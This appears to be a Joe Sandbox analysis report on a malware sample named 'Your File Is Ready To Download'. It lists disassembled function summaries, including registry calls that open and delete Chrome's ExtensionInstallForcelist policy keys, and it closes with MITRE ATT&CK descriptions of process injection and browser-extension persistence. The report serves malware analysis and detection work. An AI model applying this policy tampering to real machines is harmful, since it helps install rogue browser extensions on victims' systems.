Instruction ID: ac1356b7fee7c0b288f03a5407e3e7ae94c8fcf94cb4da5c76523f10f37d2b46
Opcode Fuzzy Hash: 258b3860957b5b028e0e9cd176acf5ef96c64507181a50602e626ed2847b817d
Instruction Fuzzy Hash: BFD0C265A1E28C2BDB3047384C0C4E87E746E21330B0807C9A530910CDC56088C08612

Function 00911A61 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome,00000000,000F003F,?), ref: 00911A74
RegDeleteKeyW.ADVAPI32(?,ExtensionInstallForcelist), ref: 00911AB1

Strings

SOFTWARE\Policies\Google\Chrome, xrefs: 00911A6A

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: DeleteOpen
String ID: SOFTWARE\Policies\Google\Chrome
API String ID: 3632437661-2379338332
Opcode ID: 67789ad536bd5741b937c001e1d19f9d465ad69f7b2f8023fc4df7a97cd8f8cb
Instruction ID: 1023d7b101ca52780f2a74377414dee0fabd2fea0574d89c76a877b23d10225e
Opcode Fuzzy Hash: 67789ad536bd5741b937c001e1d19f9d465ad69f7b2f8023fc4df7a97cd8f8cb
Instruction Fuzzy Hash: A3D0C9305086A7ABC3169F755C4E558FE247F12722B688B89E665951E3D72040C1CA82

Function 00911A00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist,00000000,000F003F,?), ref: 00911A13
RegDeleteValueW.ADVAPI32(?,0091E694), ref: 00911A3F

Strings

SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00911A09

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: DeleteOpenValue
String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
API String ID: 2654517830-1523167323
Opcode ID: f5395ad63e394e2528943bdfedaf7320e4f340ba47b784ce31c4c86be7542f1c
Instruction ID: c4bef86d52065fbf6dcaaf6c4cc1740263aab348a2e32680e753a03688dfc8db
Opcode Fuzzy Hash: f5395ad63e394e2528943bdfedaf7320e4f340ba47b784ce31c4c86be7542f1c
Instruction Fuzzy Hash: BAD0C9249197ABABD3215B245D4A588FE68BF12322B1847C9A664941E3D72145C1C782

Function 00911200 Relevance: 3.0, APIs: 2, Instructions: 46
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0091121E
RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00911252

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 8fcfdc507e119911e5ccd1e18511b2d2faefe85ab630509917bd3ce2cb1a595f
Instruction ID: 05af0b8eddbe043b0f0b6c9885241f13eb04b49ef3bc03174c991678570dc990
Opcode Fuzzy Hash: 8fcfdc507e119911e5ccd1e18511b2d2faefe85ab630509917bd3ce2cb1a595f
Instruction Fuzzy Hash: 8F015A79B4020DBADB20DAA8DD42FED777CAB45720F208645FB20DA1C1D6709E84DBA5

Function 009136F1 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 009136F9

Part of subcall function 009136C6: GetModuleHandleW.KERNEL32(mscoree.dll,?,009136FE,?,?,0091966E,000000FF,0000001E,?,00916479,?,00000001,?,?,00916955,00000018), ref: 009136D0
Part of subcall function 009136C6: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009136E0

ExitProcess.KERNEL32 ref: 00913702

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 1498e40ff290a5e8df3bdb9ffd26916aa7e440899ee558effcc6a6bd70727aea
Instruction ID: 69686d952d36c296c3a05bff801c3697ee92ca5f7542fef8dcb64e25791d7d70
Opcode Fuzzy Hash: 1498e40ff290a5e8df3bdb9ffd26916aa7e440899ee558effcc6a6bd70727aea
Instruction Fuzzy Hash: 88B09B3110410C7FCB112F11DC0E8893F36DB803E07148010F41805131DF72AED1D6C4

Function 009148AA Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 009148BF

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 76543ee0b96d746407232335236805aaf03de6132cb9bb5e04ac633b7f0dda71
Instruction ID: 87558c85efee957e1f465754b818f795a958fd116710a78028d0cf35186cd532
Opcode Fuzzy Hash: 76543ee0b96d746407232335236805aaf03de6132cb9bb5e04ac633b7f0dda71
Instruction Fuzzy Hash: 3AD05EB2A68749AADB205F717C09B663BDC9388799F148436B90CC6150F674C551EA04

Function 0091390D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00913919

Part of subcall function 009137E1: __lock.LIBCMT ref: 009137EF
Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913826
Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 0091383B
Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913865
Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 0091387B
Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913888
Part of subcall function 009137E1: __initterm.LIBCMT ref: 009138B7
Part of subcall function 009137E1: __initterm.LIBCMT ref: 009138C7

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 62017cd23bdedc0f09e9bf09734cefdcfa62d940dfb3394ee588bf11159c0da4
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 2CB092B268020C33DA202542EC03F863A1987C0B60F644020FA0C191E1A9A3AAA18089

Function 00912039 Relevance: 1.3, APIs: 1, Instructions: 14
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(0000012C), ref: 00912057

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f62dbeef4bbc55b42af33e655015597f79bab1471369a39589f70a424e9e3008
Instruction ID: 09174964305354d452d75e6298ab6c9f593c1c8c261d2e875ff513359bf78017
Opcode Fuzzy Hash: f62dbeef4bbc55b42af33e655015597f79bab1471369a39589f70a424e9e3008
Instruction Fuzzy Hash: E2D0A921B1858C8E8E293B7408081BE3908AE3E334B198B94E032C40F2AB0588E4E936

Non-executed Functions

Function 0091213C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 009125B7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009125CC
UnhandledExceptionFilter.KERNEL32(0091B178), ref: 009125D7
GetCurrentProcess.KERNEL32(C0000409), ref: 009125F3
TerminateProcess.KERNEL32(00000000), ref: 009125FA

Strings

FzFW, xrefs: 009125AC

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: FzFW
API String ID: 2579439406-2507217327
Opcode ID: 96ed47605eec6e700a2bf70779bd93e1c8a971c25f850c003bb20a399c4e7352
Instruction ID: 64025f29119e78d40a9d20e33c3b870ac2f01e92a9137658e542662514a7deaf
Opcode Fuzzy Hash: 96ed47605eec6e700a2bf70779bd93e1c8a971c25f850c003bb20a399c4e7352
Instruction Fuzzy Hash: 0621F6BAA2A204DFD321EF26FD456943BB0BB4C350F02801AE50887361D37459C2EF46

Function 0091365F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000361D), ref: 00913664

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9df98c6058d4f1a4da6ea6de8967bcee00257ecf4208033630a864d426415ea0
Instruction ID: 0433cab4978b44c35def1c9c6a8e03a5b3e1c74196139e0b22595d55902f4a7f
Opcode Fuzzy Hash: 9df98c6058d4f1a4da6ea6de8967bcee00257ecf4208033630a864d426415ea0
Instruction Fuzzy Hash: 729002603771085A8E0067705C4E69A25B16ADC78A74184606012D4168EB504140AD11

Function 00911430 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074dbd7a17795516e2566a0e2371abc3458dd9c8ec59c144762027a1070d0397
Instruction ID: f6ba89223237782915f455612d99c7f58c16a5e5bc51a35dd3b61659f7342ff9
Opcode Fuzzy Hash: 074dbd7a17795516e2566a0e2371abc3458dd9c8ec59c144762027a1070d0397
Instruction Fuzzy Hash: D5F02471A4030D5BC7215EACA8010EDB7ECEA01720BC44759D2A8C36E1E2319C808B65

Function 00914474 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0091C488,0000000C,009145AF,00000000,00000000,?,00000000,0091290A,00912B28), ref: 00914486
__crt_waiting_on_module_handle.LIBCMT ref: 00914491

Part of subcall function 0091366D: Sleep.KERNEL32(000003E8,00000000,?,009143D7,KERNEL32.DLL,?,00914423,?,00000000,0091290A,00912B28), ref: 00913679
Part of subcall function 0091366D: GetModuleHandleW.KERNEL32(?,?,009143D7,KERNEL32.DLL,?,00914423,?,00000000,0091290A,00912B28), ref: 00913682

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009144BA
GetProcAddress.KERNEL32(?,DecodePointer), ref: 009144CA
__lock.LIBCMT ref: 009144EC
InterlockedIncrement.KERNEL32(0091D520), ref: 009144F9
__lock.LIBCMT ref: 0091450D
___addlocaleref.LIBCMT ref: 0091452B

Strings

EncodePointer, xrefs: 009144AE
DecodePointer, xrefs: 009144C2
KERNEL32.DLL, xrefs: 00914480, 00914485, 00914490

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 569ad069b3fb11aa6617e4ba7764f0559f95685d38a6ccf8c75e9da444ef1987
Instruction ID: 4931ca00ef43cf1b1c989f3702212b2012412c35484d440173f5bbff2f91fe07
Opcode Fuzzy Hash: 569ad069b3fb11aa6617e4ba7764f0559f95685d38a6ccf8c75e9da444ef1987
Instruction Fuzzy Hash: 41119371B05709DFD7209F79D801BDABBE5AF88714F108519F0A9962A1CB709980DF54

Function 00919A8B Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 187COMMON

Download Yara Rule

APIs

__isctype_l.LIBCMT ref: 00919ABB

Strings

$, xrefs: 00919A96
0, xrefs: 00919B15
0, xrefs: 00919B44
-, xrefs: 00919AE1
+, xrefs: 00919AEC

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: __isctype_l
String ID: $$+$-$0$0
API String ID: 2565520105-4042548909
Opcode ID: c2ea9eda637965537a1dbed6b3cb2b2401e766686af65546a3617ba465071f82
Instruction ID: 01fefd3eb4bae002fe8d53b8ee8e614a51648bb66a2591142291dcdefe52df12
Opcode Fuzzy Hash: c2ea9eda637965537a1dbed6b3cb2b2401e766686af65546a3617ba465071f82
Instruction Fuzzy Hash: 2861ED30B4424ECAEF25CF18D5A53EA7BE9AF12314F28019AD8D59A191C3748ED5C791

Function 00915A50 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00915A5C

Part of subcall function 009145D4: __getptd_noexit.LIBCMT ref: 009145D7
Part of subcall function 009145D4: __amsg_exit.LIBCMT ref: 009145E4

__amsg_exit.LIBCMT ref: 00915A7C
__lock.LIBCMT ref: 00915A8C
InterlockedDecrement.KERNEL32(?), ref: 00915AA9
InterlockedIncrement.KERNEL32(02662D98), ref: 00915AD4

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 8d6fc235c2d12d2e7c632388e264d28a14dde6d4b36e59695cb442ed6be760ac
Instruction ID: f9697620f14bcf5610ed6bd8ef670e299d7ab2667b07a13f2da989fbb5f7c659
Opcode Fuzzy Hash: 8d6fc235c2d12d2e7c632388e264d28a14dde6d4b36e59695cb442ed6be760ac
Instruction Fuzzy Hash: 6001AD32B46B19EBCB21AB6498467D97764AFC4720F0B8205F814A7681C77469C1DFD1

Function 009163B9 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 009163D7

Part of subcall function 009169CB: __mtinitlocknum.LIBCMT ref: 009169E1
Part of subcall function 009169CB: __amsg_exit.LIBCMT ref: 009169ED
Part of subcall function 009169CB: EnterCriticalSection.KERNEL32(?,?,?,00919780,00000004,0091C700,0000000C,009164C3,?,?,00000000,00000000,00000000,?,00914586,00000001), ref: 009169F5

___sbh_find_block.LIBCMT ref: 009163E2
___sbh_free_block.LIBCMT ref: 009163F1
HeapFree.KERNEL32(00000000,?,0091C578,0000000C,009169AC,00000000,0091C5B8,0000000C,009169E6,?,?,?,00919780,00000004,0091C700,0000000C), ref: 00916421
GetLastError.KERNEL32(?,00919780,00000004,0091C700,0000000C,009164C3,?,?,00000000,00000000,00000000,?,00914586,00000001,00000214), ref: 00916432

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 5bb09631857f851e105238e40bf99053055f517b5dbf2f00cf5b28b2874e967c
Instruction ID: 713ed57bd352188dc3737387759a648a4cf016d126dfc177895a50e4f3136068
Opcode Fuzzy Hash: 5bb09631857f851e105238e40bf99053055f517b5dbf2f00cf5b28b2874e967c
Instruction Fuzzy Hash: AE01A272F0931DAAEB207BB49C07BDE3B789F80765F204018F114A60D2CF3485D19A95

Function 009165EB Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0091661F
__isleadbyte_l.LIBCMT ref: 00916653
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000040,?,?), ref: 00916684
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000040,?,?), ref: 009166F2

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 58a7d5b092679ae94ac68bcbbf694493f2c47df146548072c8f3e28d3e3328ad
Instruction ID: fb9b7fc89c7848ce1cebdd2ba519838ce6065a1cafaf50d553352905920e04a2
Opcode Fuzzy Hash: 58a7d5b092679ae94ac68bcbbf694493f2c47df146548072c8f3e28d3e3328ad
Instruction Fuzzy Hash: C831CE31F0024EEFCB20DF64C880AEE7BA9BF41391F188569E4669B191D730DD90DB50

Function 009161BC Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 009161C8

Part of subcall function 009145D4: __getptd_noexit.LIBCMT ref: 009145D7
Part of subcall function 009145D4: __amsg_exit.LIBCMT ref: 009145E4

__getptd.LIBCMT ref: 009161DF
__amsg_exit.LIBCMT ref: 009161ED
__lock.LIBCMT ref: 009161FD

Memory Dump Source

Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: e91a2d10f765db18d2968afcc1b1136c8e3cd43c139460a2c7fe67de82f7beba
Instruction ID: d911073738e30d107e030956b437e3e1fb23285d412976bc82f4d2036e5880db
Opcode Fuzzy Hash: e91a2d10f765db18d2968afcc1b1136c8e3cd43c139460a2c7fe67de82f7beba
Instruction Fuzzy Hash: 7DF09032F5930CABE720FBA89806BC937A06F84720F004169F45097292CB74A9C0DB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

